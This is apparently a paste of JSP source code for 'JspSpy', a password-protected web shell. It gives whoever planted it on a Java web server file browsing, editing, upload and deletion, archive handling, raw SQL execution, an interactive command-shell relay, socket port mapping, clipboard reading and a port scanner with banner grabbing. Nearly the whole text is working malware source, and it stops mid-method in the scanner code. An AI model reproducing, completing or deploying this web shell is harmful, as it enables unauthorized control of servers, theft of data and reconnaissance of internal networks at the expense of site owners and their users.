· 6 years ago · Jan 29, 2020, 06:04 PM
1<%@page pageEncoding="utf-8"%>
2<%@page import="java.io.*"%>
3<%@page import="java.util.*"%>
4<%@page import="java.util.regex.*"%>
5<%@page import="java.sql.*"%>
6<%@page import="java.lang.reflect.*"%>
7<%@page import="java.nio.charset.*"%>
8<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
9<%@page import="java.text.*"%>
10<%@page import="java.net.*"%>
11<%@page import="java.util.zip.*"%>
12<%@page import="java.util.jar.*"%>
13<%@page import="java.awt.*"%>
14<%@page import="java.awt.image.*"%>
15<%@page import="javax.imageio.*"%>
16<%@page import="java.awt.datatransfer.DataFlavor"%>
17<%@page import="java.util.prefs.Preferences"%>
18<%!
19/**
20* by n1nty
21* CY . I Love You.
22*/
23private static final String PW = "password123"; //password
24private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
25private static final String REQUEST_CHARSET = "ISO-8859-1";
26private static final String PAGE_CHARSET = "UTF-8";
27private static final String CURRENT_DIR = "currentdir";
28private static final String MSG = "SHOWMSG";
29private static final String PORT_MAP = "PMSA";
30private static final String DBO = "DBO";
31private static final String SHELL_ONLINE = "SHELL_ONLINE";
32private static final String ENTER = "ENTER_FILE";
33private static final String ENTER_MSG = "ENTER_FILE_MSG";
34private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR";
35private static final String SESSION_O = "SESSION_O";
36private static String SHELL_NAME = "";
37private static String WEB_ROOT = null;
38private static String SHELL_DIR = null;
39public static Map ins = new HashMap();
40private static boolean ISLINUX = false;
41
42private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout.";
43private static final String BACK_HREF = " <a href='javascript:history.back()'>Back</a>";
44
45private static class MyRequest extends HttpServletRequestWrapper {
46public MyRequest(HttpServletRequest req) {
47super(req);
48}
49public String getParameter(String name) {
50try {
51String value = super.getParameter(name);
52if (name == null)
53return null;
54return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET);
55} catch (Exception e) {
56return null;
57}
58}
59}
60private static class SpyClassLoader extends ClassLoader{
61public SpyClassLoader() {
62}
63public Class defineClass(String name,byte[] b) {
64return super.defineClass(name,b,0,b.length - 2);
65}
66}
67private static class DBOperator{
68private Connection conn = null;
69private Statement stmt = null;
70private String driver;
71private String url;
72private String uid;
73private String pwd;
74public DBOperator(String driver,String url,String uid,String pwd) throws Exception {
75this(driver,url,uid,pwd,false);
76}
77public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception {
78Class.forName(driver);
79if (connect)
80this.conn = DriverManager.getConnection(url,uid,pwd);
81this.url = url;
82this.driver = driver;
83this.uid = uid;
84this.pwd = pwd;
85}
86public void connect() throws Exception{
87this.conn = DriverManager.getConnection(url,uid,pwd);
88}
89public Object execute(String sql) throws Exception {
90if (isValid()) {
91stmt = conn.createStatement();
92if (stmt.execute(sql)) {
93return stmt.getResultSet();
94} else {
95return ""+stmt.getUpdateCount();
96}
97}
98throw new Exception("Connection is inValid.");
99}
100public void closeStmt() throws Exception{
101if (this.stmt != null)
102stmt.close();
103}
104public boolean isValid() throws Exception {
105return conn != null && !conn.isClosed();
106}
107public void close() throws Exception {
108if (isValid()) {
109closeStmt();
110conn.close();
111}
112}
113public boolean equals(Object o) {
114if (o instanceof DBOperator) {
115DBOperator dbo = (DBOperator)o;
116return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd);
117}
118return false;
119}
120public Connection getConn(){
121return this.conn;
122}
123}
124private static class StreamConnector extends Thread {
125private InputStream is;
126private OutputStream os;
127public StreamConnector( InputStream is, OutputStream os ){
128this.is = is;
129this.os = os;
130}
131public void run(){
132BufferedReader in = null;
133BufferedWriter out = null;
134try{
135in = new BufferedReader( new InputStreamReader(this.is));
136out = new BufferedWriter( new OutputStreamWriter(this.os));
137char buffer[] = new char[8192];
138int length;
139while((length = in.read( buffer, 0, buffer.length ))>0){
140out.write( buffer, 0, length );
141out.flush();
142}
143} catch(Exception e){}
144try{
145if(in != null)
146in.close();
147if(out != null)
148out.close();
149} catch( Exception e ){}
150}
151public static void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){
152new Thread(new Runnable(){
153public void run(){
154while (true) {
155try{
156byte[] data = new byte[100];
157int len = localIn.read(data);
158while (len != -1) {
159remoteOut.write(data,0,len);
160len = localIn.read(data);
161}
162}catch (Exception e) {
163break;
164}
165}
166}
167}).start();
168}
169public static void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){
170new Thread(new Runnable(){
171public void run(){
172while(true) {
173try{
174byte[] data = new byte[100];
175int len = remoteIn.read(data);
176while (len != -1) {
177localOut.write(data,0,len);
178len = remoteIn.read(data);
179}
180}catch (Exception e) {
181try{
182soc.close();
183remoteSoc.close();
184}catch(Exception ex) {
185}
186break;
187}
188}
189}
190}).start();
191}
192}
193private static class EnterFile extends File{
194private ZipFile zf = null;
195private ZipEntry entry = null;
196private boolean isDirectory = false;
197private String absolutePath = null;
198public void setEntry(ZipEntry e) {
199this.entry = e;
200}
201public void setAbsolutePath(String p) {
202this.absolutePath = p;
203}
204public void close() throws Exception{
205this.zf.close();
206}
207public void setZf(String p) throws Exception{
208if (p.toLowerCase().endsWith(".jar"))
209this.zf = new JarFile(p);
210else
211this.zf = new ZipFile(p);
212}
213public EnterFile(File parent, String child) {
214super(parent,child);
215}
216public EnterFile(String pathname) {
217super(pathname);
218}
219public EnterFile(String pathname,boolean isDir) {
220this(pathname);
221this.isDirectory = isDir;
222}
223public EnterFile(String parent, String child) {
224super(parent,child);
225}
226public EnterFile(URI uri) {
227super(uri);
228}
229public boolean exists(){
230return new File(this.zf.getName()).exists();
231}
232public File[] listFiles() {
233java.util.List list = new ArrayList();
234java.util.List handled = new ArrayList();
235String currentDir = super.getPath();
236currentDir = currentDir.replace('\\','/');
237if (currentDir.indexOf("/") == 0)
238{
239if (currentDir.length() > 1)
240currentDir = currentDir.substring(1);
241else
242currentDir = "";
243}
244Enumeration e = this.zf.entries();
245while (e.hasMoreElements())
246{
247ZipEntry entry = (ZipEntry)e.nextElement();
248String eName = entry.getName();
249if (this.zf instanceof JarFile) {
250if (!entry.isDirectory()){
251EnterFile ef = new EnterFile(eName);
252ef.setEntry(entry);
253try{
254ef.setZf(this.zf.getName());
255}catch(Exception ex) {
256}
257list.add(ef);
258}
259} else {
260if (currentDir.equals("")) {
261//zip root directory
262if (eName.indexOf("/") == -1 || eName.matches("[^/]+/$"))
263{
264EnterFile ef = new EnterFile(eName.replaceAll("/",""));
265handled.add(eName.replaceAll("/",""));
266ef.setEntry(entry);
267list.add(ef);
268} else {
269if (eName.indexOf("/") != -1) {
270String tmp = eName.substring(0,eName.indexOf("/"));
271if (!handled.contains(tmp) && !Util.isEmpty(tmp)) {
272EnterFile ef = new EnterFile(tmp,true);
273ef.setEntry(entry);
274list.add(ef);
275handled.add(tmp);
276}
277}
278}
279} else {
280if (eName.startsWith(currentDir)) {
281if (eName.matches(currentDir+"/[^/]+/?$")) {
282//file.
283EnterFile ef = new EnterFile(eName);
284ef.setEntry(entry);
285list.add(ef);
286if (eName.endsWith("/")) {
287String tmp = eName.substring(eName.lastIndexOf('/',eName.length()-2));
288tmp = tmp.substring(1,tmp.length()-1);
289handled.add(tmp);
290}
291} else {
292//dir
293try {
294String tmp = eName.substring(currentDir.length()+1);
295tmp = tmp.substring(0,tmp.indexOf('/'));
296if (!handled.contains(tmp) && !Util.isEmpty(tmp)) {
297EnterFile ef = new EnterFile(tmp,true);
298ef.setAbsolutePath(currentDir+"/"+tmp);
299ef.setEntry(entry);
300list.add(ef);
301handled.add(tmp);
302}
303} catch (Exception ex) {
304}
305}
306}
307}
308}
309}
310return (File[])list.toArray(new File[0]);
311}
312public boolean isDirectory(){
313return this.entry.isDirectory() || this.isDirectory;
314}
315public String getParent(){
316return "";
317}
318public String getAbsolutePath(){
319return absolutePath != null ? absolutePath : super.getPath();
320}
321public String getName(){
322if (this.zf instanceof JarFile) {
323return this.getAbsolutePath();
324} else {
325return super.getName();
326}
327}
328public long lastModified(){
329return entry.getTime();
330}
331public boolean canRead(){
332return false;
333}
334public boolean canWrite(){
335return false;
336}
337public boolean canExecute(){
338return false;
339}
340public long length(){
341return entry.getSize();
342}
343}
344private static class OnLineProcess {
345private String cmd = "first";
346private Process pro;
347public OnLineProcess(Process p){
348this.pro = p;
349}
350public void setPro(Process p) {
351this.pro = p;
352}
353public void setCmd(String c){
354this.cmd = c;
355}
356public String getCmd(){
357return this.cmd;
358}
359public Process getPro(){
360return this.pro;
361}
362public void stop(){
363this.pro.destroy();
364}
365}
366private static class OnLineConnector extends Thread {
367private OnLineProcess ol = null;
368private InputStream is;
369private OutputStream os;
370private String name;
371public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){
372this.is = is;
373this.os = os;
374this.name = name;
375this.ol = ol;
376}
377public void run(){
378BufferedReader in = null;
379BufferedWriter out = null;
380try{
381in = new BufferedReader( new InputStreamReader(this.is));
382out = new BufferedWriter( new OutputStreamWriter(this.os));
383char buffer[] = new char[128];
384if(this.name.equals("exeRclientO")) {
385//from exe to client
386int length = 0;
387while((length = in.read( buffer, 0, buffer.length ))>0){
388String str = new String(buffer, 0, length);
389str = str.replaceAll("&","&").replaceAll("<","<").replaceAll(">",">");
390str = str.replaceAll(""+(char)13+(char)10,"<br/>");
391str = str.replaceAll("\n","<br/>");
392out.write(str.toCharArray(), 0, str.length());
393out.flush();
394}
395} else {
396//from client to exe
397while(true) {
398while(this.ol.getCmd() == null) {
399Thread.sleep(500);
400}
401if (this.ol.getCmd().equals("first")) {
402this.ol.setCmd(null);
403continue;
404}
405this.ol.setCmd(this.ol.getCmd() + (char)10);
406char[] arr = this.ol.getCmd().toCharArray();
407out.write(arr,0,arr.length);
408out.flush();
409this.ol.setCmd(null);
410}
411}
412} catch(Exception e){
413}
414try{
415if(in != null)
416in.close();
417if(out != null)
418out.close();
419} catch( Exception e ){
420}
421}
422}
423private static class Table{
424private ArrayList rows = null;
425private boolean echoTableTag = false;
426public void setEchoTableTag(boolean v) {
427this.echoTableTag = v;
428}
429public Table(){
430this.rows = new ArrayList();
431}
432public void addRow(Row r) {
433this.rows.add(r);
434}
435public String toString(){
436StringBuffer html = new StringBuffer();
437if (echoTableTag)
438html.append("<table>");
439for (int i = 0;i<rows.size();i++) {
440Row r=(Row)rows.get(i);
441html.append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");
442ArrayList columns = r.getColumns();
443for (int a = 0;a<columns.size();a++) {
444Column c = (Column)columns.get(a);
445html.append("<td nowrap>");
446String vv = Util.htmlEncode(Util.getStr(c.getValue()));
447if (vv.equals(""))
448vv = " ";
449html.append(vv);
450html.append("</td>");
451}
452html.append("</tr>");
453}
454if (echoTableTag)
455html.append("</table>");
456return html.toString();
457}
458public static String rs2Table(ResultSet rs,String sep,boolean op) throws Exception{
459StringBuffer table = new StringBuffer();
460ResultSetMetaData meta = rs.getMetaData();
461int count = meta.getColumnCount();
462if (!op)
463table.append("<b style='color:red;margin-left:15px'><i> View Struct </i></b> - <a href=\"javascript:doPost({o:'executesql'})\">View All Tables</a><br/><br/>");
464else
465table.append("<b style='color:red;margin-left:15px'><i> All Tables </i></b><br/><br/>");
466table.append("<script>function view(t){document.getElementById('sql').value='select * from "+sep+"'+t+'"+sep+"';}</script>");
467table.append("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\" style=\"margin-left:15px\"><tr class=\"head\">");
468for (int i = 1;i<=count;i++) {
469table.append("<td nowrap>"+meta.getColumnName(i)+"</td>");
470}
471if (op)
472table.append("<td> </td>");
473table.append("</tr>");
474while (rs.next()) {
475String tbName = null;
476table.append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");
477for (int i = 1;i<=count;i++) {
478String v = rs.getString(i);
479if (i == 3)
480tbName = v;
481table.append("<td nowrap>"+Util.null2Nbsp(v)+"</td>");
482}
483if (op)
484table.append("<td nowrap> <a href=\"#\" onclick=\"view('"+tbName+"')\">View</a> | <a href=\"javascript:doPost({o:'executesql',type:'struct',table:'"+tbName+"'})\">Struct</a> | <a href=\"javascript:doPost({o:'export',table:'"+tbName+"'})\">Export </a> | <a href=\"javascript:doPost({o:'vExport',table:'"+tbName+"'})\">Save To File</a> </td>");
485table.append("</tr>");
486}
487table.append("</table><br/>");
488return table.toString();
489}
490}
491private static class Row{
492private ArrayList cols = null;
493public Row(){
494this.cols = new ArrayList();
495}
496public void addColumn(Column n) {
497this.cols.add(n);
498}
499public ArrayList getColumns(){
500return this.cols;
501}
502}
503private static class Column{
504private String value;
505public Column(String v){
506this.value = v;
507}
508public String getValue(){
509return this.value;
510}
511}
512private static class Util{
513public static boolean isEmpty(String s) {
514return s == null || s.trim().equals("");
515}
516public static boolean isEmpty(Object o) {
517return o == null || isEmpty(o.toString());
518}
519public static String getSize(long size,char danwei) {
520if (danwei == 'M') {
521double v = formatNumber(size / 1024.0 / 1024.0,2);
522if (v > 1024) {
523return getSize(size,'G');
524}else {
525return v + "M";
526}
527} else if (danwei == 'G') {
528return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G";
529} else if (danwei == 'K') {
530double v = formatNumber(size / 1024.0,2);
531if (v > 1024) {
532return getSize(size,'M');
533} else {
534return v + "K";
535}
536} else if (danwei == 'B') {
537if (size > 1024) {
538return getSize(size,'K');
539}else {
540return size + "B";
541}
542}
543return ""+0+danwei;
544}
545public static boolean exists(String[] arr,String v) {
546for (int i =0;i<arr.length;i++) {
547if (v.equals(arr[i])) {
548return true;
549}
550}
551return false;
552}
553public static double formatNumber(double value,int l) {
554NumberFormat format = NumberFormat.getInstance();
555format.setMaximumFractionDigits(l);
556format.setGroupingUsed(false);
557return new Double(format.format(value)).doubleValue();
558}
559public static boolean isInteger(String v) {
560if (isEmpty(v))
561return false;
562return v.matches("^\\d+$");
563}
564public static String formatDate(long time) {
565SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss");
566return format.format(new java.util.Date(time));
567}
568public static String convertPath(String path) {
569return path != null ? path.replace('\\','/') : "";
570}
571public static String htmlEncode(String v) {
572if (isEmpty(v))
573return "";
574return v.replaceAll("&","&").replaceAll("<","<").replaceAll(">",">");
575}
576public static String getStr(String s) {
577return s == null ? "" :s;
578}
579public static String null2Nbsp(String s) {
580if (s == null)
581s = " ";
582return s;
583}
584public static String getStr(Object s) {
585return s == null ? "" :s.toString();
586}
587public static String exec(String regex, String str, int group) {
588Pattern pat = Pattern.compile(regex);
589Matcher m = pat.matcher(str);
590if (m.find())
591return m.group(group);
592return null;
593}
594public static void outMsg(Writer out,String msg) throws Exception {
595outMsg(out,msg,"center");
596}
597public static void outMsg(Writer out,String msg,String align) throws Exception {
598out.write("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:"+align+";font-weight:bold;margin:10px\">"+msg+"</div>");
599}
600public static String highLight(String str) {
601str = str.replaceAll("\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b","<span style='color:blue'>$1</span>");
602str = str.replaceAll("\t(//.+)","\t<span style='color:green'>$1</span>");
603return str;
604}
605}
606private static class UploadBean {
607private String fileName = null;
608private String suffix = null;
609private String savePath = "";
610private ServletInputStream sis = null;
611private OutputStream targetOutput = null;
612private byte[] b = new byte[1024];
613public void setTargetOutput(OutputStream stream) {
614this.targetOutput = stream;
615}
616public UploadBean() {
617}
618public void setSavePath(String path) {
619this.savePath = path;
620}
621public String getFileName(){
622return this.fileName;
623}
624public void parseRequest(HttpServletRequest request) throws IOException {
625sis = request.getInputStream();
626int a = 0;
627int k = 0;
628String s = "";
629while ((a = sis.readLine(b,0,b.length))!= -1) {
630s = new String(b, 0, a,PAGE_CHARSET);
631if ((k = s.indexOf("filename=\""))!= -1) {
632s = s.substring(k + 10);
633k = s.indexOf("\"");
634s = s.substring(0, k);
635File tF = new File(s);
636if (tF.isAbsolute()) {
637fileName = tF.getName();
638} else {
639fileName = s;
640}
641k = s.lastIndexOf(".");
642suffix = s.substring(k + 1);
643upload();
644}
645}
646}
647private void upload() throws IOException{
648try {
649OutputStream out = null;
650if (this.targetOutput != null)
651out = this.targetOutput;
652else
653out = new FileOutputStream(new File(savePath,fileName));
654int a = 0;
655int k = 0;
656String s = "";
657while ((a = sis.readLine(b,0,b.length))!=-1) {
658s = new String(b, 0, a);
659if ((k = s.indexOf("Content-Type:"))!=-1) {
660break;
661}
662}
663sis.readLine(b,0,b.length);
664while ((a = sis.readLine(b,0,b.length)) != -1) {
665s = new String(b, 0, a);
666if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) {
667break;
668}
669out.write(b, 0, a);
670}
671if (out instanceof FileOutputStream)
672out.close();
673} catch (IOException ioe) {
674throw ioe;
675}
676}
677}
678%>
679<%
680SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1);
681String myAbsolutePath = application.getRealPath(request.getServletPath());
682if (Util.isEmpty(myAbsolutePath)) {//for weblogic
683SHELL_NAME = request.getServletPath();
684myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString();
685SHELL_NAME=request.getContextPath()+SHELL_NAME;
686WEB_ROOT = new File(application.getResource("/").getPath()).toString();
687} else {
688WEB_ROOT = application.getRealPath("/");
689}
690SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator)));
691if (SHELL_DIR.indexOf('/') == 0)
692ISLINUX = true;
693else
694ISLINUX = false;
695if (session.getAttribute(CURRENT_DIR) == null)
696session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR));
697request = new MyRequest(request);
698if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) {
699String o = request.getParameter("o");
700if (o != null && o.equals("login")) {
701((Invoker)ins.get("login")).invoke(request,response,session);
702return;
703} else if (o != null && o.equals("vLogin")) {
704((Invoker)ins.get("vLogin")).invoke(request,response,session);
705return;
706} else {
707((Invoker)ins.get("vLogin")).invoke(request,response,session);
708return;
709}
710}
711%>
712<%!
713private static interface Invoker {
714public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception;
715public boolean doBefore();
716public boolean doAfter();
717}
718private static class DefaultInvoker implements Invoker{
719public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
720}
721public boolean doBefore(){
722return true;
723}
724public boolean doAfter() {
725return true;
726}
727}
728private static class ScriptInvoker extends DefaultInvoker{
729public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
730try {
731PrintWriter out = response.getWriter();
732out.println("<script type=\"text/javascript\">"+
733" String.prototype.trim = function(){return this.replace(/^\\s+|\\s+$/,'');};"+
734" function fso(obj) {"+
735" this.currentDir = '"+JSession.getAttribute(CURRENT_DIR)+"';"+
736" this.filename = obj.filename;"+
737" this.path = obj.path;"+
738" this.filetype = obj.filetype;"+
739" this.charset = obj.charset;"+
740" };"+
741" fso.prototype = {"+
742" copy:function(){"+
743" var path = prompt('Copy To : ',this.path);"+
744" if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"+
745" doPost({o:'copy',src:this.path,to:path});"+
746" },"+
747" move:function() {"+
748" var path =prompt('Move To : ',this.path);"+
749" if (path == null || path.trim().length == 0 || path.trim() == this.path)return;"+
750" doPost({o:'move',src:this.path,to:path})"+
751" },"+
752" vEdit:function() {"+
753" if (!this.charset)"+
754" doPost({o:'vEdit',filepath:this.path});"+
755" else"+
756" doPost({o:'vEdit',filepath:this.path,charset:this.charset});"+
757" },"+
758" down:function() {"+
759" doPost({o:'down',path:this.path})"+
760" },"+
761" removedir:function() {"+
762" if (!confirm('Dangerous ! Are You Sure To Delete '+this.filename+'?'))return;"+
763" doPost({o:'removedir',dir:this.path});"+
764" },"+
765" mkdir:function() {"+
766" var name = prompt('Input New Directory Name','');"+
767" if (name == null || name.trim().length == 0)return;"+
768" doPost({o:'mkdir',name:name});"+
769" },"+
770" subdir:function(out) {"+
771" doPost({o:'filelist',folder:this.path,outentry:(out || 'none')})"+
772" },"+
773" parent:function() {"+
774" var parent=(this.path.substr(0,this.path.lastIndexOf(\"/\")))+'/';"+
775" doPost({o:'filelist',folder:parent})"+
776" },"+
777" createFile:function() {"+
778" var path = prompt('Input New File Name','');"+
779" if (path == null || path.trim().length == 0) return;"+
780" doPost({o:'vCreateFile',filepath:path})"+
781" },"+
782" deleteBatch:function() {"+
783" if (!confirm('Are You Sure To Delete These Files?')) return;"+
784" var selected = new Array();"+
785" var inputs = document.getElementsByTagName('input');"+
786" for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"+
787" if (selected.length == 0) {alert('No File Selected');return;}"+
788" doPost({o:'deleteBatch',files:selected.join(',')})"+
789" },"+
790" packBatch:function() {"+
791" var selected = new Array();"+
792" var inputs = document.getElementsByTagName('input');"+
793" for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}"+
794" if (selected.length == 0) {alert('No File Selected');return;}"+
795" var savefilename = prompt('Input Target File Name(Only Support ZIP)','pack.zip');"+
796" if (savefilename == null || savefilename.trim().length == 0)return;"+
797" doPost({o:'packBatch',files:selected.join(','),savefilename:savefilename})"+
798" },"+
799" pack:function(showconfig) {"+
800" if (showconfig && confirm('Need Pack Configuration?')) {doPost({o:'vPack',packedfile:this.path});return;}"+
801" var tmpName = '';"+
802" if (this.filename.indexOf('.') == -1) tmpName = this.filename;"+
803" else tmpName = this.filename.substr(0,this.filename.lastIndexOf('.'));"+
804" tmpName += '.zip';"+
805" var path = this.path;"+
806" var name = prompt('Input Target File Name (Only Support Zip)',tmpName);"+
807" if (name == null || path.trim().length == 0) return;"+
808" doPost({o:'pack',packedfile:path,savefilename:name})"+
809" },"+
810" vEditProperty:function() {"+
811" var path = this.path;"+
812" doPost({o:'vEditProperty',filepath:path})"+
813" },"+
814" unpack:function() {"+
815" var path = prompt('unpack to : ',this.currentDir+'/'+this.filename.substr(0,this.filename.lastIndexOf('.')));"+
816" if (path == null || path.trim().length == 0) return;"+
817" doPost({o:'unpack',savepath:path,zipfile:this.path})"+
818" },"+
819" enter:function() {"+
820" doPost({o:'enter',filepath:this.path})"+
821" }"+
822" };"+
823" function doPost(obj) {"+
824" var form = document.forms[\"doForm\"];"+
825" var elements = form.elements;for (var i = form.length - 1;i>=0;i--){form.removeChild(elements[i])}"+
826" for (var pro in obj)"+
827" {"+
828" var input = document.createElement(\"input\");"+
829" input.type = \"hidden\";"+
830" input.name = pro;"+
831" input.value = obj[pro];"+
832" form.appendChild(input);"+
833" }"+
834" form.submit();"+
835" }"+
836"</script>");
837
838} catch (Exception e) {
839
840throw e ;
841}
842}
843}
844private static class BeforeInvoker extends DefaultInvoker {
845public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
846try {
847PrintWriter out = response.getWriter();
848out.println("<html><head><title>JspSpy Private Codz By - Ninty</title><style type=\"text/css\">"+
849"body,td{font: 12px Arial,Tahoma;line-height: 16px;}"+
850".input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}"+
851".area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}"+
852".bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}"+
853"a {color: #00f;text-decoration:underline;}"+
854"a:hover{color: #f00;text-decoration:none;}"+
855".alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}"+
856".alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}"+
857".focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}"+
858".head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}"+
859".head td span{font-weight:normal;}"+
860"form{margin:0;padding:0;}"+
861"h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}"+
862"ul.info li{margin:0;color:#444;line-height:24px;height:24px;}"+
863"u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}"+
864".secho{height:400px;width:100%;overflow:auto;border:none}"+
865"hr{border: 1px solid rgb(221, 221, 221); height: 0px;}"+
866"</style></head><body style=\"margin:0;table-layout:fixed; word-break:break-all\">");
867} catch (Exception e) {
868
869throw e ;
870}
871}
872}
873private static class AfterInvoker extends DefaultInvoker {
874public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
875try {
876PrintWriter out = response.getWriter();
877out.println("</body></html>");
878} catch (Exception e) {
879
880throw e ;
881}
882}
883}
884private static class DeleteBatchInvoker extends DefaultInvoker {
885public boolean doBefore(){return false;}
886public boolean doAfter(){return false;}
887public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
888try {
889String files = request.getParameter("files");
890int success = 0;
891int failed = 0;
892if (!Util.isEmpty(files)) {
893String currentDir = JSession.getAttribute(CURRENT_DIR).toString();
894String[] arr = files.split(",");
895for (int i = 0;i<arr.length;i++) {
896String fs = arr[i];
897File f = new File(currentDir,fs);
898if(f.delete())
899success += 1;
900else
901failed += 1;
902}
903}
904JSession.setAttribute(MSG,success+" Files Deleted <span style='color:green'>Success</span> , "+failed+" Files Deleted <span style='color:red'>Failed</span>!");
905response.sendRedirect(SHELL_NAME);
906} catch (Exception e) {
907
908throw e ;
909}
910}
911}
912private static class ClipBoardInvoker extends DefaultInvoker {
913public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
914try {
915PrintWriter out = response.getWriter();
916out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
917" <tr>"+
918" <td>"+
919" <h2>System Clipboard »</h2>"+
920"<p><pre>");
921try{
922out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getContents(DataFlavor.stringFlavor).getTransferData(DataFlavor.stringFlavor))));
923}catch (Exception ex) {
924out.println("ClipBoard is Empty Or Is Not Text Data !");
925}
926out.println("</pre>"+
927" <input class=\"bt\" name=\"button\" id=\"button\" onClick=\"history.back()\" value=\"Back\" type=\"button\" size=\"100\" />"+
928" </p>"+
929" </td>"+
930" </tr>"+
931"</table>");
932} catch (Exception e) {
933
934throw e ;
935}
936}
937}
938private static class VPortScanInvoker extends DefaultInvoker {
939public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
940try {
941PrintWriter out = response.getWriter();
942String ip = request.getParameter("ip");
943String ports = request.getParameter("ports");
944String timeout = request.getParameter("timeout");
945String banner = request.getParameter("banner");
946if (Util.isEmpty(ip))
947ip = "127.0.0.1";
948if (Util.isEmpty(ports))
949ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500";
950if (Util.isEmpty(timeout))
951timeout = "2";
952out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
953"<h2 id=\"Bin_H2_Title\">PortScan >></h2>"+
954"<div id=\"YwLB\"><form action=\""+SHELL_NAME+"\" method=\"post\">"+
955"<p><input type=\"hidden\" value=\"portScan\" name=\"o\">"+
956"IP : <input name=\"ip\" type=\"text\" value=\""+ip+"\" id=\"ip\" class=\"input\" style=\"width:10%;margin:0 8px;\" /> Port : <input name=\"ports\" type=\"text\" value=\""+ports+"\" id=\"ports\" class=\"input\" style=\"width:40%;margin:0 8px;\" /> <input "+(!Util.isEmpty(banner) ? "checked" : "")+" type='checkbox' value='yes' name='banner'/>Banner Timeout (Second) : <input name=\"timeout\" type=\"text\" value=\""+timeout+"\" id=\"timeout\" class=\"input\" size=\"5\" style=\"margin:0 8px;\" /> <input type=\"submit\" name=\"submit\" value=\"Scan\" id=\"submit\" class=\"bt\" />"+
957"</p>"+
958"</form></div>"+
959"</td></tr></table>");
960} catch (Exception e) {
961
962throw e ;
963}
964}
965}
966private static class PortScanInvoker extends DefaultInvoker {
967public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
968try {
969PrintWriter out = response.getWriter();
970((Invoker)ins.get("vPortScan")).invoke(request,response,JSession);
971out.println("<hr/>");
972String ip = request.getParameter("ip");
973String ports = request.getParameter("ports");
974String timeout = request.getParameter("timeout");
975String banner = request.getParameter("banner");
976int iTimeout = 0;
977if (Util.isEmpty(ip) || Util.isEmpty(ports))
978return;
979if (!Util.isInteger(timeout)) {
980timeout = "2";
981}
982iTimeout = Integer.parseInt(timeout);
983Map rs = new LinkedHashMap();
984String[] portArr = ports.split(",");
985for (int i =0;i<portArr.length;i++) {
986String port = portArr[i];
987BufferedReader r = null;
988try {
989Socket s = new Socket();
990s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout);
991s.setSoTimeout(iTimeout);
992if (!Util.isEmpty(banner)) {
993r = new BufferedReader(new InputStreamReader(s.getInputStream()));
994StringBuffer sb = new StringBuffer();
995String b = r.readLine();
996while (b != null) {
997sb.append(b+" ");
998try {
999b = r.readLine();
1000} catch (Exception e) {
1001break;
1002}
1003}
1004rs.put(port,"Open <span style=\"color:grey;font-weight:normal\">"+sb.toString()+"</span>");
1005r.close();
1006} else {
